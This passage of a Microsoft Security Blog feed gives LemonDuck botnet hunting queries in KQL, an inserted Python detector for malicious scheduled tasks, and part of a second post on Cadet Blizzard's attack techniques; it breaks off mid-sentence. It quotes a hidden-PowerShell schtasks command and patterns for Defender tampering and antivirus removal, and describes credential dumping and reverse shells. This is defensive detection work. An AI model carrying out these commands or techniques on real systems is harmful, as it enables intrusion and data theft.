Alerts with the following titles in the security center can indicate threat activity on your network:

 * LemonDuck botnet C2 domain activity
 * LemonDuck malware

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

 * Suspicious PowerShell command line
 * Suspicious remote activity
 * Suspicious service registration
 * Suspicious Security Software Discovery
 * Suspicious System Network Configuration Discovery
 * Suspicious sequence of exploration activities
 * Suspicious Process Discovery
 * Suspicious System Owner/User Discovery
 * Suspicious System Network Connections Discovery
 * Suspicious Task Scheduler activity
 * Suspicious Microsoft Defender Antivirus exclusion
 * Suspicious behavior by cmd.exe was observed
 * Suspicious remote PowerShell execution
 * Suspicious behavior by svchost.exe was observed
 * A WMI event filter was bound to a suspicious event consumer
 * Attempt to hide use of dual-purpose tool
 * System executable renamed and launched
 * Microsoft Defender Antivirus protection turned off
 * Anomaly detected in ASEP registry
 * A script with suspicious content was observed
 * An obfuscated command line sequence was identified
 * A process was injected with potentially malicious code
 * A malicious PowerShell Cmdlet was invoked on the machine
 * Suspected credential theft activity
 * Outbound connection to non-standard port
 * Sensitive credential memory read

### Advanced hunting

The LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.

**NOTE:** The following sample queries let you search for a week's worth of events.
To explore up to 30 days' worth of raw data to inspect events in your network and locate potential LemonDuck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab and select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.

**LemonDuck template subject lines**

Looks for subject lines present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail them to contacts of the mailboxes on impacted machines. Additionally, checks whether attachments are present. General attachment types to check for at present are .DOC, .ZIP or .JS, though these could change, as could the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)

```kusto
EmailEvents
| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1
```

**LemonDuck Botnet Registration Functions**

Looks for instances of function runs with the name "SIEX", which within the LemonDuck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceEvents
| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"
```

**LemonDuck keyword identification**

Looks for simple usage of LemonDuck keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_any("Lemon_Duck","LemonDuck")
```

**LemonDuck Microsoft Defender tampering**

Looks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Antivirus uninstallation attempts**

Looks for a command line event where LemonDuck or other similar malware uses WMIC (`product where name like ... call uninstall /nointeractive`) to silently uninstall third-party antivirus products, matching on the vendor and product names listed in the query. Custom alerts could be created in an environment for the antivirus products actually deployed there.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmic.exe"
| where InitiatingProcessCommandLine has_all("product where","name like","call uninstall","/nointeractive")
| where InitiatingProcessCommandLine has_any("Kaspersky","avast","avp","security","eset","AntiVirus","Norton Security")
```

**Known LemonDuck component script installations**

Looks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the "Killer" and "Infection" functions for the malware, as well as the mining components and potential secondary functions. Options for more specific instances are included to account for environments with potential false positives. The most general versions are intended to account for minor script or component changes, such as switching to non-.bin files and uncommon components.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName in ("powershell.exe","cmd.exe")
| where InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash",".bin") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash","kr.bin","if.bin","m6.bin")
```

**LemonDuck named scheduled creation**

Looks for instances where LemonDuck creates statically named scheduled tasks, or for the semi-unique task creation pattern LemonDuck also uses, which launches hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: `"schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD"`.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has("/create")
| where ProcessCommandLine has_any("/tn blackball","/tn blutea","/tn rtsa") or
ProcessCommandLine has_all("/create","/ru","system","/sc","/mo","/tn","/F","/tr","powershell -w hidden -c PS_CMD")
```

**Competition killer script scheduled task execution**

Looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based on historical versions from 2018 and earlier, which have grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok") and DeleteVolume >= 40 and DeleteVolume <= 80
```

**LemonDuck hosts file adjustment for dynamic C2 downloads**

Looks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and a more specific version, allowing the detection of this technique if other activity groups were to utilize it.
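As an added example that is not part of the Microsoft post, the following Python re-implements the two scheduled-task hunting rules above (named task creation, and the competition-killer delete volume with its per-device `make_set` aggregation) so the logic can be tested offline against process telemetry exported from any source. The `has`/`has_any`/`has_all` helpers approximate KQL term matching, and all event records, device IDs and task names are constructed sample data.

```python
import re
from collections import defaultdict

# Approximation of KQL term matching: a term is a run of alphanumerics, and
# `has` succeeds when the search phrase's terms occur contiguously in the text.
_TERM = re.compile(r"[a-z0-9_]+")


def _terms(s):
    return _TERM.findall(s.lower())


def has(text, phrase):
    haystack, needle = _terms(text), _terms(phrase)
    if not needle:
        return False
    n = len(needle)
    return any(haystack[i:i + n] == needle for i in range(len(haystack) - n + 1))


def has_any(text, phrases):
    return any(has(text, p) for p in phrases)


def has_all(text, phrases):
    return all(has(text, p) for p in phrases)


# Rule 1: "LemonDuck named scheduled creation" (terms taken from the query above).
NAMED_TASKS = ("/tn blackball", "/tn blutea", "/tn rtsa")
HIDDEN_PS_TASK = ("/create", "/ru", "system", "/sc", "/mo", "/tn", "/F", "/tr",
                  "powershell -w hidden -c PS_CMD")


def named_task_creation(events):
    """Return schtasks /create events whose task name or shape matches LemonDuck."""
    hits = []
    for ev in events:
        if ev["FileName"].lower() != "schtasks.exe":
            continue
        cl = ev["ProcessCommandLine"]
        if not has(cl, "/create"):
            continue
        if has_any(cl, NAMED_TASKS) or has_all(cl, HIDDEN_PS_TASK):
            hits.append(ev)
    return hits


# Rule 2: "Competition killer script scheduled task execution".
KILLER_MARKERS = ("Mysa", "Sorry", "Oracle Java Update", "ok")


def killer_script_devices(events, lo=40, hi=80):
    """Per device, collect the distinct `schtasks /Delete` command lines (the KQL
    summarize make_set), then flag devices whose set names a known competitor task
    and whose distinct-delete volume lies within [lo, hi]. Returns {DeviceId: volume}."""
    per_device = defaultdict(set)
    for ev in events:
        cl = ev["ProcessCommandLine"]
        if has_all(cl, ("schtasks.exe", "/Delete", "/TN", "/F")):
            per_device[ev["DeviceId"]].add(cl)
    return {dev: len(cmds) for dev, cmds in per_device.items()
            if lo <= len(cmds) <= hi and any(has_any(c, KILLER_MARKERS) for c in cmds)}


# Constructed sample events (not real telemetry). The random task name reuses the
# example command line quoted in the post; device IDs are placeholders.
NAMED_TASK_SAMPLE = 'schtasks.exe /create /tn blackball /tr "powershell -w hidden -c PS_CMD" /sc MINUTE /mo 60'
RANDOM_TASK_SAMPLE = (r'"schtasks.exe" /create /ru system /sc MINUTE /mo 60 '
                      r'/tn fs5yDs9ArkV\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD"')
BENIGN_TASK_SAMPLE = r'schtasks.exe /create /tn "Nightly Backup" /tr C:\backup\run.exe /sc daily'


def _ev(device, file_name, cmd):
    return {"DeviceId": device, "FileName": file_name, "ProcessCommandLine": cmd}


def sample_events():
    events = [
        _ev("dev-A", "schtasks.exe", BENIGN_TASK_SAMPLE),
        _ev("dev-A", "schtasks.exe", NAMED_TASK_SAMPLE),
        _ev("dev-B", "schtasks.exe", RANDOM_TASK_SAMPLE),
        # Same command line launched via powershell.exe: ignored by rule 1's FileName filter.
        _ev("dev-C", "powershell.exe", RANDOM_TASK_SAMPLE),
    ]
    # dev-A: 43 generic deletions plus two competitor task names -> 45 distinct, flagged.
    for i in range(43):
        events.append(_ev("dev-A", "schtasks.exe", f"schtasks.exe /Delete /TN legacy{i} /F"))
    events.append(_ev("dev-A", "schtasks.exe", "schtasks.exe /Delete /TN Mysa /F"))
    events.append(_ev("dev-A", "schtasks.exe", 'schtasks.exe /Delete /TN "Oracle Java Update" /F'))
    # dev-B: a competitor name but only 3 deletions -> below the volume floor.
    for name in ("Mysa", "Sorry", "cleanup"):
        events.append(_ev("dev-B", "schtasks.exe", f"schtasks.exe /Delete /TN {name} /F"))
    # dev-C: 50 deletions with no competitor names -> volume alone is not enough.
    for i in range(50):
        events.append(_ev("dev-C", "schtasks.exe", f"schtasks.exe /Delete /TN cleanup{i} /F"))
    return events


if __name__ == "__main__":
    evs = sample_events()
    for hit in named_task_creation(evs):
        print("task creation:", hit["DeviceId"], hit["ProcessCommandLine"])
    print("killer-script devices:", killer_script_devices(evs))
```

Lowering `lo` shows why the query keeps a volume floor: a single deletion of a competitor-named task is common housekeeping, while dozens on one host in a short window is the KR.Bin signature.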
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_all("GetHostAddresses","etc","hosts")
or InitiatingProcessCommandLine has_all("GetHostAddresses","IPAddressToString","etc","hosts","DownloadData")
```

[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).

The post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

_Published: 2021-07-29._
_CVEs referenced by the post above: CVE-2017-0144, CVE-2017-8464, CVE-2019-0708, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065._

_The following entry is a separate Microsoft Security Blog post on the threat actor Cadet Blizzard (record last seen 2023-06-23)._

As Russia's invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provides greater clarity into the tools and techniques used by Russian state-sponsored threat actors. Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense.
These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.

Today, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor's tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>).

Microsoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU-affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations.
Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as "Free Civilian".

Microsoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia's invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard's operations, though comparatively less prolific in both scale and scope than more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.

Microsoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia's war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard.
As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we're sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.

## Who is Cadet Blizzard?

Cadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions' websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.

Cadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard's activity peak between January and June 2022, followed by an extended period of reduced activity.
The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new "Free Civilian" Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets' off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.

Figure 1. A heatmap of the operational cadence of Cadet Blizzard

Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support, including during the WhisperGate destructive attack.

### Targets

Cadet Blizzard's operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact.
Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organization\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine probably were at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. 
Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\nFigure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. 
Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precision profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volume of a device\nFigure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\nFigure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet\nFigure 5. 
PowerShell _DownloadFile_ commandlet\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\nFigure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. The activities are anticipated to be consistent with anti-forensics activities.\n\n * Common file targets during extraction are:\n * _sec.evtx_\n * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\nFigure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en-masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. 
Credential material (such as SSH keys) is also a common target, providing methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.

Also in January 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name “Free Civilian.” The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same “Free Civilian” moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers, with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.

Figure 8. Free Civilian hack-and-leak front

### Related ecosystems

Cadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. Though there have been various forms of intersection in threat activity, when these groups have been observed operating independently, their tactics, techniques, and procedures (TTPs) and capabilities have often been distinct, therefore making it operationally valuable to distinguish these activity groups.

**Storm-0587**

Storm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations, usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine’s website created in July 2021 